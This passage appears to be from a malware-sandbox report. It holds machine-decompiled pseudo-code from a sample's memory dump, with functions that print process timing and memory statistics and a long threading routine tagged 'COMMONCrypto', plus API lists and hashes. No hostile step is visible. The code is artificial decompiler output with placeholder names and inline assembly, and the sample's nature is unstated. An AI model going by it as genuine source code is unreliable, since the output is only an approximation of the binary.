						_t100 = _v36 + _v20;
						asm("adc eax, [ebp-0xc]");
						_t153 = _v8;
						_v16 = _v32;
						if(_v8 != 0) {
							_t85 =  *0x43a894; // 0x43a5b0
							fputs("    Cnt:",  *_t85);
							_t87 = E0041F380(_v28, _v24, 0xf4240, 0);
							_push(_t132);
							_push(_t87);
							_t132 = 0x20;
							_t126 = 0xf;
							E003EA9E0(_t126, 0x20, _t153);
							_t89 =  *0x43a894; // 0x43a5b0
							fputs(" MCycles",  *_t89);
						}
						E003EAA30(_t132, _t153, _v36, _v32, _t137, _t144);
						if(_v8 != 0) {
							_t78 =  *0x43a894; // 0x43a5b0
							fputs("    Freq (cnt/ptime):",  *_t78);
							if((E0041F380(_t100, _v16, 0xa, 0) | _t132) == 0) {
								_t132 = 0;
								_t80 = 1;
							}
							_t81 = E0041F380(_v28, _v24, _t80, _t132);
							_push(_t132);
							_push(_t81);
							_t132 = 0x20;
							_t121 = 6;
							E003EA9E0(_t121, 0x20, 0);
							_t83 =  *0x43a894; // 0x43a5b0
							fputs(" MHz",  *_t83);
						}
						E003EAA30(_t132, 0, _t100, _v16, _t137, _t144);
						_t157 = _v12;
						if(_v12 != 0) {
							_push(0);
							_push(_v80);
							E003EAB54("Virtual ", _t157);
						}
						E003EAA30(_t132, _t157, _t137, _t144, _t137, _t144);
						_t158 = _v12;
						if(_v12 != 0) {
							_push(0);
							_push(_v108);
							E003EAB54("Physical", _t158);
						}
						_t114 =  *0x43a894; // 0x43a5b0
						return E003B1FA0(_t114);
					}
					_t94 = LoadLibraryW(L"Psapi.dll");
					if(_t94 == 0) {
						goto L5;
					}
					_t134 = GetProcAddress(_t94, "GetProcessMemoryInfo");
					if(_t134 == 0) {
						goto L5;
					}
					goto L4;
				}
				return _t54;
			}





































                                                                                                    0x003ea7c1
                                                                                                    0x003ea7c9
                                                                                                    0x003ea7d5
                                                                                                    0x003ea7e3
                                                                                                    0x003ea7eb
                                                                                                    0x003ea7ee
                                                                                                    0x003ea7f1
                                                                                                    0x003ea7f9
                                                                                                    0x003ea7fc
                                                                                                    0x003ea808
                                                                                                    0x003ea813
                                                                                                    0x003ea817
                                                                                                    0x003ea836
                                                                                                    0x003ea845
                                                                                                    0x003ea848
                                                                                                    0x003ea852
                                                                                                    0x003ea854
                                                                                                    0x003ea856
                                                                                                    0x003ea865
                                                                                                    0x003ea865
                                                                                                    0x003ea879
                                                                                                    0x003ea87f
                                                                                                    0x003ea88b
                                                                                                    0x003ea88e
                                                                                                    0x003ea898
                                                                                                    0x003ea8a6
                                                                                                    0x003ea8a8
                                                                                                    0x003ea8aa
                                                                                                    0x003ea8b9
                                                                                                    0x003ea8c4
                                                                                                    0x003ea8c7
                                                                                                    0x003ea8ca
                                                                                                    0x003ea8ce
                                                                                                    0x003ea8d1
                                                                                                    0x003ea8d3
                                                                                                    0x003ea8df
                                                                                                    0x003ea8f4
                                                                                                    0x003ea8f9
                                                                                                    0x003ea8fa
                                                                                                    0x003ea8fd
                                                                                                    0x003ea8ff
                                                                                                    0x003ea900
                                                                                                    0x003ea905
                                                                                                    0x003ea911
                                                                                                    0x003ea918
                                                                                                    0x003ea926
                                                                                                    0x003ea92f
                                                                                                    0x003ea931
                                                                                                    0x003ea93d
                                                                                                    0x003ea956
                                                                                                    0x003ea95a
                                                                                                    0x003ea95c
                                                                                                    0x003ea95c
                                                                                                    0x003ea965
                                                                                                    0x003ea96a
                                                                                                    0x003ea96b
                                                                                                    0x003ea96e
                                                                                                    0x003ea970
                                                                                                    0x003ea971
                                                                                                    0x003ea976
                                                                                                    0x003ea982
                                                                                                    0x003ea989
                                                                                                    0x003ea995
                                                                                                    0x003ea99c
                                                                                                    0x003ea99f
                                                                                                    0x003ea9a1
                                                                                                    0x003ea9a7
                                                                                                    0x003ea9aa
                                                                                                    0x003ea9aa
                                                                                                    0x003ea9b8
                                                                                                    0x003ea9bd
                                                                                                    0x003ea9c0
                                                                                                    0x003ea9c2
                                                                                                    0x003ea9c8
                                                                                                    0x003ea9cb
                                                                                                    0x003ea9cb
                                                                                                    0x003ea9d0
                                                                                                    0x00000000
                                                                                                    0x003ea9dd
                                                                                                    0x003ea81e
                                                                                                    0x003ea826
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ea830
                                                                                                    0x003ea834
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003ea834
                                                                                                    0x003ea9df

                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,?,?), ref: 003EA7BA
                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,003E9A51,00000000), ref: 003EA7C1
                                                                                                      • Part of subcall function 003BA4D0: GetSystemTimeAsFileTime.KERNEL32(?,003EA7DA,00000000,00000000,777989A0), ref: 003BA4D1
                                                                                                    • memset.MSVCRT ref: 003EA7E3
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,00000000,777989A0), ref: 003EA7FC
                                                                                                    • GetProcAddress.KERNEL32(00000000,K32GetProcessMemoryInfo), ref: 003EA811
                                                                                                    • LoadLibraryW.KERNEL32(Psapi.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,003E9A51,00000000), ref: 003EA81E
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessMemoryInfo), ref: 003EA82E
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000028,?,?,?,?,?,?,?,?,?,?,?,?,?,003E9A51), ref: 003EA83C
                                                                                                    • GetProcAddress.KERNEL32(?,QueryProcessCycleTime), ref: 003EA850
                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,003E9A51,00000000), ref: 003EA85C
                                                                                                    • fputs.MSVCRT ref: 003EA8DF
                                                                                                    • __aulldiv.LIBCMT ref: 003EA8F4
                                                                                                    • fputs.MSVCRT ref: 003EA911
                                                                                                    • fputs.MSVCRT ref: 003EA93D
                                                                                                    • __aulldiv.LIBCMT ref: 003EA94D
                                                                                                    • __aulldiv.LIBCMT ref: 003EA965
                                                                                                    • fputs.MSVCRT ref: 003EA982
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Processfputs$AddressCurrentProc__aulldiv$Time$FileHandleLibraryLoadModuleSystemTimesmemset
                                                                                                    • String ID: Cnt:$ Freq (cnt/ptime):$ MCycles$ MHz$GetProcessMemoryInfo$Global $K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
                                                                                                    • API String ID: 4173168154-4201791934
                                                                                                    • Opcode ID: 91501c1c7b3cefca744db9fe902b36c9e5dfa3c96f06202d93aa4be587825708
                                                                                                    • Instruction ID: 00ba75d38162fb6150cdaf842bf7c4bc0c4cde01323664843146058d4a162675
                                                                                                    • Opcode Fuzzy Hash: 91501c1c7b3cefca744db9fe902b36c9e5dfa3c96f06202d93aa4be587825708
                                                                                                    • Instruction Fuzzy Hash: 57618C71E00228BFDF159BE6DC86EEEBBB9EF48300F51413AF505A7190DA356805CB69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003CCC1E Relevance: 11.3, APIs: 7, Instructions: 760COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 90%
                                                                                                    			E003CCC1E(char __ecx, unsigned int __edx, void* __eflags) {
				void* __edi;
				intOrPtr _t408;
				signed int _t409;
				void* _t417;
				signed int _t426;
				void* _t429;
				intOrPtr* _t435;
				void* _t438;
				void* _t439;
				void* _t440;
				void* _t447;
				void* _t455;
				void* _t458;
				intOrPtr _t460;
				void* _t463;
				intOrPtr* _t469;
				signed int _t472;
				void* _t479;
				signed int _t484;
				signed int _t487;
				signed int _t495;
				intOrPtr _t498;
				signed int _t508;
				void* _t521;
				void* _t524;
				void* _t535;
				unsigned int _t539;
				void* _t540;
				void* _t543;
				void* _t552;
				void* _t554;
				void* _t560;
				void* _t564;
				signed int _t568;
				signed int _t569;
				signed int _t597;
				signed int _t612;
				signed int _t622;
				signed int _t623;
				signed int _t624;
				signed int _t638;
				void* _t647;
				void* _t648;
				void* _t649;
				unsigned int _t653;
				void* _t654;
				void* _t655;
				void* _t657;
				void* _t662;
				signed int* _t663;
				void* _t664;
				void* _t668;
				void** _t669;
				void** _t670;
				void* _t672;
				void* _t673;
				void* _t677;
				void* _t680;
				signed int* _t681;
				void** _t683;
				void** _t684;
				void* _t685;
				void* _t687;
				void* _t688;

				E0041F1B0(E00424349, _t685);
				_t688 = _t687 - 0xe8;
				 *((char*)(_t685 - 0x1d)) = __ecx;
				_push( *((intOrPtr*)(_t685 + 0x14)));
				_t653 = __edx;
				L003CD94B(_t685 - 0xf4, __eflags);
				_t672 = 0;
				_t637 = 1;
				 *(_t685 - 4) = 0;
				_t408 = E003BA508(_t685 - 0xe8, 1, _t685 - 0x68, _t685 - 0xa4, _t685 - 0x39);
				 *((intOrPtr*)(_t685 - 0xa8)) = _t408;
				if(_t408 >= 0) {
					_t409 = 1;
					__eflags =  *((intOrPtr*)(_t685 - 0xa4)) - _t409;
					if( *((intOrPtr*)(_t685 - 0xa4)) == _t409) {
						__eflags =  *((char*)(_t685 - 0x1d));
						_t539 = _t653;
						 *(_t685 - 0x1c) = _t409;
						 *(_t685 - 0x18) = _t539;
						if( *((char*)(_t685 - 0x1d)) == 0) {
							L13:
							__eflags = _t539 - 1;
							if(_t539 > 1) {
								L16:
								 *(_t685 + 0x17) = 1;
								L17:
								_push( *(_t685 - 0x18));
								L003CD778(_t685 - 0x14);
								_t540 =  *(_t685 - 0x14);
								__eflags =  *(_t685 - 0x18) - _t672;
								 *(_t685 - 4) = 1;
								 *(_t685 - 0x60) = _t540;
								 *(_t685 - 0x10) = _t672;
								if( *(_t685 - 0x18) <= _t672) {
									L34:
									_t549 =  *(_t685 + 0x1c);
									_t654 =  *(_t685 + 0x18);
									__eflags =  *(_t685 + 0x1c) - _t672;
									 *(_t685 - 0x24) = _t672;
									if( *(_t685 + 0x1c) != _t672) {
										_t637 = _t654;
										 *(_t685 - 0x24) = E0041E1B0(_t549, _t654);
									}
									__eflags =  *(_t685 - 0x18) - _t672;
									if( *(_t685 - 0x18) <= _t672) {
										L40:
										E00418080(_t685 - 0x5c);
										 *(_t685 - 4) = 4;
										 *(_t685 - 0x44) = _t672;
										 *(_t685 - 0x40) = 1;
										E003CD5F1(_t685 - 0x34);
										 *(_t685 - 0x28) =  *(_t685 - 0x28) & 0x00000000;
										 *(_t685 - 0x2c) = _t672;
										__eflags =  *(_t685 + 0x17);
										 *(_t685 - 4) = 5;
										if( *(_t685 + 0x17) == 0) {
											L58:
											__eflags =  *(_t685 - 0x18) - _t672;
											 *(_t685 - 0x10) = _t672;
											if( *(_t685 - 0x18) <= _t672) {
												L74:
												_t552 =  *(_t685 + 0x24);
												__eflags = _t552 - _t672;
												if(_t552 == _t672) {
													L76:
													__eflags =  *(_t685 + 0x17);
													if( *(_t685 + 0x17) == 0) {
														_t655 = E003C85A0(_t540);
														__eflags = _t655 - _t672;
														if(_t655 != _t672) {
															L45:
															 *(_t685 - 4) = 4;
															_t554 = _t685 - 0x38;
															L144:
															L003CD920(_t554);
															DeleteCriticalSection(_t685 - 0x5c);
															_t555 =  *(_t685 - 0x14);
															 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
															__eflags =  *(_t685 - 0x14) - _t672;
															if( *(_t685 - 0x14) != _t672) {
																E003C95C0(_t555, _t655, _t685, 3);
															}
															_t673 = _t655;
															goto L150;
														}
														__eflags =  *(_t685 - 0x44) - _t672;
														if(__eflags == 0) {
															L91:
															 *(_t685 - 0x70) = _t672;
															 *(_t685 - 0x6c) = _t672;
															_push(_t685 - 0xa0);
															L003C78B0( *((intOrPtr*)(_t540 + 0x44)) + 8, _t637, __eflags);
															_t560 =  *(_t685 - 0x18);
															 *(_t685 - 0x80) = _t672;
															 *(_t685 - 0x7c) = _t672;
															 *(_t685 - 0x78) = _t672;
															 *(_t685 - 0x74) = _t672;
															 *(_t685 - 0x70) =  *(_t540 + 0x58);
															__eflags = _t560 - _t672;
															 *(_t685 - 0x6c) =  *(_t540 + 0x5c);
															if(_t560 <= _t672) {
																L94:
																_t638 = _t685 - 0xa0;
																_t655 =  *((intOrPtr*)( *( *(_t685 + 0x28))))(_t638, 1);
																__eflags = _t655 - _t672;
																if(_t655 != _t672) {
																	goto L45;
																}
																 *(_t685 - 0x40) =  *(_t685 - 0x40) & 0x00000000;
																_t426 =  *(_t685 - 0x1c) *  *(_t685 - 0x18);
																__eflags = _t426 - 1;
																 *(_t685 - 0x44) = _t672;
																 *(_t685 + 0x18) = _t426;
																if(_t426 > 1) {
																	L98:
																	 *(_t685 + 0x1f) = 1;
																	L99:
																	__eflags =  *(_t685 - 0x18) - _t672;
																	 *(_t685 - 0x10) = _t672;
																	if( *(_t685 - 0x18) <= _t672) {
																		L117:
																		__eflags =  *(_t685 + 0x1f);
																		if( *(_t685 + 0x1f) == 0) {
																			L139:
																			_t655 =  *(_t685 - 0x44);
																			__eflags = _t655 - _t672;
																			if(__eflags != 0) {
																				goto L45;
																			}
																			_push(_t685 - 0xa0);
																			L003C78B0( *((intOrPtr*)(_t540 + 0x44)) + 8, _t638, __eflags);
																			 *(_t685 - 0x80) = _t672;
																			 *(_t685 - 0x7c) = _t672;
																			 *(_t685 - 0x78) = _t672;
																			 *(_t685 - 0x74) = _t672;
																			_t429 = E0041F4B0( *(_t685 - 0x1c), _t672,  *(_t540 + 0x58),  *(_t540 + 0x5c));
																			_t564 =  *(_t685 - 0x18);
																			 *(_t685 - 0x70) = _t429;
																			__eflags = _t564 - _t672;
																			 *(_t685 - 0x6c) = _t638;
																			if(_t564 <= _t672) {
																				L143:
																				_t655 =  *((intOrPtr*)( *( *(_t685 + 0x28)) + 4))(_t685 - 0xa0, 1);
																				 *(_t685 - 4) = 4;
																				__eflags = _t655 - _t672;
																				_t554 = _t685 - 0x38;
																				if(_t655 == _t672) {
																					L003CD920(_t554);
																					DeleteCriticalSection(_t685 - 0x5c);
																					_t566 =  *(_t685 - 0x14);
																					 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																					__eflags =  *(_t685 - 0x14) - _t672;
																					if( *(_t685 - 0x14) != _t672) {
																						E003C95C0(_t566, _t655, _t685, 3);
																					}
																					_t673 = 0;
																					__eflags = 0;
																					goto L150;
																				}
																				goto L144;
																			}
																			_t435 = _t540 + 0x100;
																			do {
																				 *(_t685 - 0x80) =  *(_t685 - 0x80) +  *((intOrPtr*)(_t435 - 4));
																				asm("adc [ebp-0x7c], esi");
																				 *(_t685 - 0x78) =  *(_t685 - 0x78) +  *_t435;
																				asm("adc [ebp-0x74], esi");
																				_t435 = _t435 + 0x190;
																				_t564 = _t564 - 1;
																				__eflags = _t564;
																			} while (_t564 != 0);
																			goto L143;
																		}
																		__eflags =  *(_t685 - 0x18) - _t672;
																		 *(_t685 + 0x10) = _t672;
																		 *(_t685 + 0x2c) = _t672;
																		if( *(_t685 - 0x18) <= _t672) {
																			goto L139;
																		}
																		_t657 = _t540;
																		 *(_t685 + 0x18) =  *(_t685 - 0x18);
																		do {
																			__eflags =  *(_t685 - 0x1c) - _t672;
																			 *(_t685 + 0x1c) = _t672;
																			if( *(_t685 - 0x1c) <= _t672) {
																				goto L128;
																			} else {
																				goto L121;
																			}
																			do {
																				L121:
																				_t438 = E00417E20(_t657 +  *(_t685 + 0x1c) * 4);
																				__eflags =  *(_t685 + 0x10) - _t672;
																				if( *(_t685 + 0x10) == _t672) {
																					__eflags = _t438 - _t672;
																					if(_t438 != _t672) {
																						 *(_t685 + 0x10) = _t438;
																					}
																				}
																				_t568 =  *(_t685 + 0x1c);
																				__eflags =  *(_t685 + 0x2c) - _t672;
																				_t439 =  *(_t657 + 0xe0 + _t568 * 4);
																				if( *(_t685 + 0x2c) == _t672) {
																					__eflags = _t439 - _t672;
																					if(_t439 != _t672) {
																						 *(_t685 + 0x2c) = _t439;
																					}
																				}
																				_t569 = _t568 + 1;
																				__eflags = _t569 -  *(_t685 - 0x1c);
																				 *(_t685 + 0x1c) = _t569;
																			} while (_t569 <  *(_t685 - 0x1c));
																			L128:
																			_t657 = _t657 + 0x190;
																			_t342 = _t685 + 0x18;
																			 *_t342 =  *(_t685 + 0x18) - 1;
																			__eflags =  *_t342;
																		} while ( *_t342 != 0);
																		_t440 =  *(_t685 + 0x10);
																		__eflags = _t440 - _t672;
																		if(__eflags != 0) {
																			L42:
																			if(__eflags > 0) {
																				_t440 = _t440 & 0x0000ffff | 0x80070000;
																				__eflags = _t440;
																			}
																			_t655 = _t440;
																			goto L45;
																		}
																		__eflags =  *(_t685 + 0x2c) - _t672;
																		if( *(_t685 + 0x2c) == _t672) {
																			goto L139;
																		}
																		 *(_t685 - 4) = 4;
																		L003CD920(_t685 - 0x38);
																		DeleteCriticalSection(_t685 - 0x5c);
																		_t571 =  *(_t685 - 0x14);
																		 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																		__eflags =  *(_t685 - 0x14) - _t672;
																		if( *(_t685 - 0x14) != _t672) {
																			E003C95C0(_t571, _t657, _t685, 3);
																		}
																		_t673 =  *(_t685 + 0x2c);
																		goto L150;
																	} else {
																		goto L100;
																	}
																	do {
																		L100:
																		_t677 = _t540 +  *(_t685 - 0x10) * 0x190;
																		__eflags =  *(_t685 - 0x10);
																		if(__eflags != 0) {
																			 *(_t677 + 0x58) =  *(_t540 + 0x58);
																			 *(_t677 + 0x5c) =  *(_t540 + 0x5c);
																		} else {
																			 *((intOrPtr*)(_t685 - 0xb0)) =  *((intOrPtr*)(_t677 + 0x100));
																			_t638 = 0;
																			_t455 = L003C7C24( *((intOrPtr*)( *(_t685 + 0x2c) + 0xc)),  *((intOrPtr*)(_t677 + 0xfc)), 0);
																			_t458 = L003C7C24( *((intOrPtr*)( *(_t685 + 0x2c) + 8)),  *((intOrPtr*)(_t685 - 0xb0)), 0);
																			asm("adc ebx, edx");
																			 *(_t677 + 0x58) = L003CD8E6(0, _t455 + _t458, 0,  *((intOrPtr*)(_t685 + 8)),  *((intOrPtr*)(_t685 + 0xc)));
																			_t460 =  *((intOrPtr*)(_t677 + 0x44));
																			 *(_t677 + 0x5c) = 0;
																			 *(_t460 + 0x5c) =  *(_t685 + 0x28);
																			 *(_t460 + 0x38) =  *(_t685 + 0x18);
																			 *(_t460 + 0x3c) =  *(_t460 + 0x3c) & 0x00000000;
																			L003C7805(_t460 + 8, 0, __eflags);
																			_t540 =  *(_t685 - 0x60);
																		}
																		_t447 = L003BDCC6(_t685 - 0xf4, __eflags);
																		__eflags = _t447;
																		if(_t447 <= 0) {
																			_t447 = 1;
																		}
																		__eflags =  *(_t685 + 0x1f);
																		 *(_t677 + 0xc) = _t447;
																		if( *(_t685 + 0x1f) == 0) {
																			_push(0);
																			_t673 = E003C8ACD(_t677);
																			__eflags = _t673;
																			if(_t673 != 0) {
																				L137:
																				 *(_t685 - 4) = 4;
																				L003CD920(_t685 - 0x38);
																				DeleteCriticalSection(_t685 - 0x5c);
																				_t575 =  *(_t685 - 0x14);
																				 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																				__eflags =  *(_t685 - 0x14);
																				if( *(_t685 - 0x14) != 0) {
																					E003C95C0(_t575, 0, _t685, 3);
																				}
																				goto L150;
																			}
																		} else {
																			__eflags =  *(_t685 - 0x1c);
																			 *(_t685 + 0x10) = 0;
																			if( *(_t685 - 0x1c) <= 0) {
																				goto L115;
																			}
																			_t662 =  *(_t685 - 0x10) *  *(_t685 - 0x1c);
																			__eflags = _t662;
																			while(1) {
																				__eflags =  *(_t685 - 0x10);
																				if( *(_t685 - 0x10) == 0) {
																					__eflags =  *(_t685 + 0x10);
																					if( *(_t685 + 0x10) == 0) {
																						_push(1);
																						_pop(0);
																					}
																				}
																				_t638 = (_t662 +  *(_t685 + 0x10)) * 0x00000150 & 0x000007ff;
																				_t463 = E003CD6D1(_t677,  *(_t685 + 0x10), 0, _t638);
																				__eflags = _t463;
																				 *(_t685 + 0x24) = _t463;
																				if(_t463 != 0) {
																					break;
																				}
																				 *(_t685 + 0x10) =  *(_t685 + 0x10) + 1;
																				__eflags =  *(_t685 + 0x10) -  *(_t685 - 0x1c);
																				if( *(_t685 + 0x10) <  *(_t685 - 0x1c)) {
																					continue;
																				}
																				goto L115;
																			}
																			 *(_t685 - 4) = 4;
																			L003CD920(_t685 - 0x38);
																			DeleteCriticalSection(_t685 - 0x5c);
																			_t585 =  *(_t685 - 0x14);
																			 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
																			__eflags =  *(_t685 - 0x14);
																			if( *(_t685 - 0x14) != 0) {
																				E003C95C0(_t585, _t662, _t685, 3);
																			}
																			_t673 =  *(_t685 + 0x24);
																			goto L150;
																		}
																		L115:
																		 *(_t685 - 0x10) =  *(_t685 - 0x10) + 1;
																		__eflags =  *(_t685 - 0x10) -  *(_t685 - 0x18);
																	} while ( *(_t685 - 0x10) <  *(_t685 - 0x18));
																	_t672 = 0;
																	__eflags = 0;
																	goto L117;
																}
																__eflags =  *( *(_t685 + 0x10)) - _t672;
																if( *( *(_t685 + 0x10)) != _t672) {
																	goto L98;
																}
																 *(_t685 + 0x1f) =  *(_t685 + 0x1f) & 0x00000000;
																goto L99;
															}
															_t469 = _t540 + 0x100;
															do {
																 *(_t685 - 0x80) =  *(_t685 - 0x80) +  *((intOrPtr*)(_t469 - 4));
																asm("adc [ebp-0x7c], esi");
																 *(_t685 - 0x78) =  *(_t685 - 0x78) +  *_t469;
																asm("adc [ebp-0x74], esi");
																_t469 = _t469 + 0x190;
																_t560 = _t560 - 1;
																__eflags = _t560;
															} while (_t560 != 0);
															goto L94;
														}
														L90:
														_t655 =  *(_t685 - 0x44);
														goto L45;
													}
													__eflags =  *(_t685 - 0x18) - _t672;
													 *(_t685 - 0x10) = _t672;
													if(__eflags <= 0) {
														L82:
														L003C7805( *((intOrPtr*)(_t540 + 0x44)) + 8, _t637, __eflags);
														_t440 = E003C9726(_t685 - 0x38, _t672);
														__eflags =  *(_t685 - 0x44) - _t672;
														if( *(_t685 - 0x44) != _t672) {
															goto L90;
														}
														__eflags = _t440 - _t672;
														if(__eflags == 0) {
															goto L91;
														}
														goto L42;
													}
													_t663 = _t540 + 0xe0;
													while(1) {
														_t440 = L00417E00( *((intOrPtr*)(_t663 - 0xd8)));
														__eflags = _t440 - _t672;
														if(__eflags != 0) {
															goto L42;
														}
														_t472 =  *_t663;
														__eflags = _t472 - _t672;
														 *(_t685 + 0x1c) = _t472;
														if(_t472 != _t672) {
															 *(_t685 - 4) = 4;
															L003CD920(_t685 - 0x38);
															DeleteCriticalSection(_t685 - 0x5c);
															_t590 =  *(_t685 - 0x14);
															 *(_t685 - 4) =  *(_t685 - 4) & 0x00000000;
															__eflags =  *(_t685 - 0x14) - _t672;
															if( *(_t685 - 0x14) != _t672) {
																E003C95C0(_t590, _t663, _t685, 3);
															}
															_t673 =  *(_t685 + 0x1c);
															goto L150;
														}
														 *(_t685 - 0x10) =  *(_t685 - 0x10) + 1;
														_t663 =  &(_t663[0x64]);
														__eflags =  *(_t685 - 0x10) -  *(_t685 - 0x18);
														if(__eflags < 0) {
															continue;
														}
														goto L82;
													}
													goto L42;
												}
												_t655 =  *((intOrPtr*)( *_t552 + 8))();
												__eflags = _t655 - _t672;
												if(_t655 != _t672) {
													goto L45;
												}
												goto L76;
											} else {
												goto L59;
											}
											do {
												L59:
												_t637 =  *(_t685 + 0x18);
												_t479 = 0;
												_t680 = _t540 +  *(_t685 - 0x10) * 0x190;
												__eflags = 0;
												if(0 > 0) {
													L63:
													 *((intOrPtr*)(_t680 + 0x58)) = L003CD8E6(_t637, L003C7C24( *((intOrPtr*)( *(_t685 + 0x2c) + 4)), _t637, _t479), _t637,  *((intOrPtr*)(_t685 + 8)),  *((intOrPtr*)(_t685 + 0xc)));
													 *(_t680 + 0x5c) = _t637;
													_t484 =  *(0x43ea60 + ( *(_t685 - 0x10) & 0x000000ff) * 4);
													_t172 = _t680 + 0x4c; // 0x4c
													_t664 = _t172;
													 *(_t680 + 0x60) = _t484;
													_t597 =  *0x0043EA60 << 0x00000003 ^ _t484;
													__eflags = _t597;
													 *(_t680 + 0x60) = _t597;
													 *(_t685 + 0x20) = 2;
													 *((intOrPtr*)(_t680 + 0x68)) =  *((intOrPtr*)( *(_t685 + 0x2c) + 0x10));
													do {
														_push(0x60);
														_t487 = E003B1E0C();
														__eflags = _t487;
														if(_t487 == 0) {
															_t186 = _t685 + 0x1c;
															 *_t186 =  *(_t685 + 0x1c) & 0x00000000;
															__eflags =  *_t186;
														} else {
															 *(_t685 + 0x1c) = _t487;
															 *((intOrPtr*)(_t487 + 4)) = 0;
															 *((intOrPtr*)(_t487 + 0x38)) = 0;
															 *((intOrPtr*)(_t487 + 0x3c)) = 0;
															 *((intOrPtr*)(_t487 + 0x5c)) = 0;
															 *_t487 = 0x42adcc;
														}
														 *(_t664 - 8) =  *(_t685 + 0x1c);
														L00403CED(_t664,  *(_t685 + 0x1c));
														_t664 = _t664 + 4;
														_t192 = _t685 + 0x20;
														 *_t192 =  *(_t685 + 0x20) - 1;
														__eflags =  *_t192;
														 *((intOrPtr*)( *(_t685 + 0x1c) + 0x58)) = _t685 - 0x5c;
													} while ( *_t192 != 0);
													__eflags =  *(_t685 - 0x10);
													if( *(_t685 - 0x10) == 0) {
														_t498 =  *((intOrPtr*)(_t680 + 0x44));
														 *(_t498 + 0x5c) =  *(_t685 + 0x28);
														 *(_t498 + 0x38) =  *(_t685 - 0x18);
														_t201 = _t498 + 0x3c;
														 *_t201 =  *(_t498 + 0x3c) & 0x00000000;
														__eflags =  *_t201;
													}
													__eflags =  *(_t685 + 0x17);
													if( *(_t685 + 0x17) != 0) {
														__eflags =  *(_t685 - 0x18) - 1;
														 *(_t680 + 0x64) =  *(_t685 - 0x10) * 0x00000150 & 0x000007ff;
														_t495 = _t685 - 0x34;
														 *(_t680 + 0x10) = _t495;
														 *((char*)(_t680 + 0x38)) = _t495 & 0xffffff00 |  *(_t685 - 0x18) - 0x00000001 > 0x00000000;
														_t673 = E003CD5FB(_t680);
														__eflags = _t673;
														if(_t673 != 0) {
															goto L137;
														}
													}
													goto L72;
												}
												if(0 < 0) {
													L62:
													_t479 = 0;
													__eflags = 0;
													_t637 = 0x64;
													goto L63;
												}
												__eflags = _t637 - 0x64;
												if(_t637 >= 0x64) {
													goto L63;
												}
												goto L62;
												L72:
												 *(_t685 - 0x10) =  *(_t685 - 0x10) + 1;
												__eflags =  *(_t685 - 0x10) -  *(_t685 - 0x18);
											} while ( *(_t685 - 0x10) <  *(_t685 - 0x18));
											_t672 = 0;
											__eflags = 0;
											goto L74;
										}
										_t637 = 0;
										_t440 = L00417F60(_t685 - 0x30, 0);
										__eflags = _t440 - _t672;
										if(__eflags == 0) {
											 *(_t685 - 0x28) = 1;
											 *(_t685 - 0x2c) =  *(_t685 - 0x18);
											 *((intOrPtr*)(_t685 - 0x38)) = _t685 - 0x14;
											goto L58;
										}
										goto L42;
									} else {
										_t681 = _t540 + 0x164;
										 *(_t685 - 0x10) =  *(_t685 - 0x18);
										do {
											L003CD998( &(_t681[1]), _t685 - 0xf4);
											_t681[0xa] = _t654;
											 *_t681 =  *(_t685 + 0x20);
											 *(_t681 - 0x5c) =  *(_t685 + 0x1c);
											 *(_t681 - 0x68) = _t654;
											 *(_t681 - 0x6c) =  *(_t685 - 0x24);
											_t681 =  &(_t681[0x64]);
											_t114 = _t685 - 0x10;
											 *_t114 =  *(_t685 - 0x10) - 1;
											__eflags =  *_t114;
										} while ( *_t114 != 0);
										_t672 = 0;
										__eflags = 0;
										goto L40;
									}
								}
								_t543 = _t540 + 0xf4;
								__eflags = _t543;
								while(1) {
									_t508 =  *(_t685 - 0x10);
									 *(_t543 - 0xe0) = _t508;
									asm("sbb ecx, ecx");
									 *(_t685 - 0xd0) =  *(_t685 - 0xd0) & 0x00000000;
									 *(_t685 - 0xcc) =  *(_t685 - 0xcc) & 0x00000000;
									 *(_t543 - 4) =  !( ~_t508) &  *(_t685 + 0x28);
									 *_t543 =  *(_t685 + 0x24);
									_t612 = 7;
									 *(_t543 - 0xdc) =  *(_t685 - 0x1c);
									memcpy(_t543 - 0xd8,  *(_t685 + 0x10), _t612 << 2);
									_t688 = _t688 + 0xc;
									_t683 = _t543 - 0xb4;
									 *(_t685 - 4) = 2;
									_t668 = E003BA669( *((intOrPtr*)(_t685 - 0xa8)), 1, _t683, _t685 - 0xd0);
									__eflags = _t668;
									if(_t668 != 0) {
										break;
									}
									_t669 = _t543 - 0xb8;
									L00403CED(_t669,  *(_t685 - 0xd0));
									__eflags =  *_t669;
									if( *_t669 != 0) {
										L22:
										 *(_t685 - 4) = 1;
										E003BA87F(_t685 - 0xd0);
										_push(0x11);
										_t647 = 0x10;
